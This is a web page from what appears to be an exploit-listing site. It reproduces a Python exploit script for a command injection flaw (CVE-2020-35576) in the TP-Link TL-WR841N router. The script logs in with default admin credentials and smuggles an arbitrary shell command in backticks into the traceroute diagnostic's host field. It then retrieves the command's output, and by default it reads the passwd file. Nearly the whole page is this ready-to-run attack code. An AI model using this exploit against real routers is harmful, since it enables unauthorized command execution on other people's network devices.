tplink tlwr841n command injection
▸▸▸ Exploit & Vulnerability >> webapps exploit & hardware vulnerability Code...
 Code...
				
# Exploit Title: TP-Link TL-WR841N - Command Injection # Date: 2020-12-13 # Exploit Author: Koh You Liang # Vendor Homepage: https://www.tp-link.com/ # Software Link: https://static.tp-link.com/TL-WR841N(JP)_V13_161028.zip # Version: TL-WR841N 0.9.1 4.0 # Tested on: Windows 10 # CVE : CVE-2020-35576 import requests import sys import time try: _ = sys.argv[2] payload = ' '.join(sys.argv[1:]) except IndexError: try: payload = sys.argv[1] except IndexError: print("[*] Command not specified, using the default `cat etc/passwd=`") payload = 'cat etc/passwd' # Default credentials is admin:admin - replace with your own cookies = { 'Authorization': 'Basic YWRtaW46YWRtaW4=' } headers = { 'Host': '192.168.0.1', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko=/20100101 Firefox/84.0', 'Accept': '*/*', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'text/plain', 'Content-Length': '197', 'Origin': 'http://192.168.0.1', 'Connection': 'close', 'Referer': 'http://192.168.0.1/mainFrame.htm', } data1 = \ '''[TRACEROUTE_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,8\r\nmaxHopCount=20\r\ntimeout=50\r\nnumberOfTries=1\r\nhost="`{}`"\r\ndataBlockSize=64\r\nX_TP_ConnName=ewan_ipoe_d\r\ndiagnosticsState=Requested\r\nX_TP_HopSeq=0\r\n'''.format(payload) response1 = requests.post('http://192.168.0.1/cgi?2', headers=headers, cookies=cookies, data=data1, verify=False) print('[+] Sending payload...') try: response1.text.splitlines()[0] except IndexError: sys.exit('[-] Cannot get response. Please check your cookie.') if response1.text.splitlines()[0] != '[error]0': sys.exit('[*] Router/Firmware is not vulnerable.') data2 = '[ACT_OP_TRACERT#0,0,0,0,0,0#0,0,0,0,0,0]0,0\r\n' response2 = requests.post('http://192.168.0.1/cgi?7', headers=headers, cookies=cookies, data=data2, verify=False) print('[+] Receiving response from router...') time.sleep(0.8) # Buffer time for traceroute to succeed data3 = '''[TRACEROUTE_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,3\r\ndiagnosticsState\r\nX_TP_HopSeq\r\nX_TP_Result\r\n''' response3 = requests.post('http://192.168.0.1/cgi?1', headers=headers, cookies=cookies, data=data3, verify=False) if '=:' in response3.text.splitlines()[3]: print('[-] Command not supported.') else: print('[+] Exploit successful!') for line_number, line in enumerate(response3.text.splitlines()): try: if line_number == 3: print(line[12:]) if line_number > 3 and line != '[error]0': print(line) if 'not known' in line: break except IndexError: break
Tplink tlwr841n command injection Vulnerability / Exploit Source : Tplink tlwr841n command injection
 
 
	 Register
Register Easy integrations and simple setup help you start scanning in just some minutes
					Easy integrations and simple setup help you start scanning in just some minutes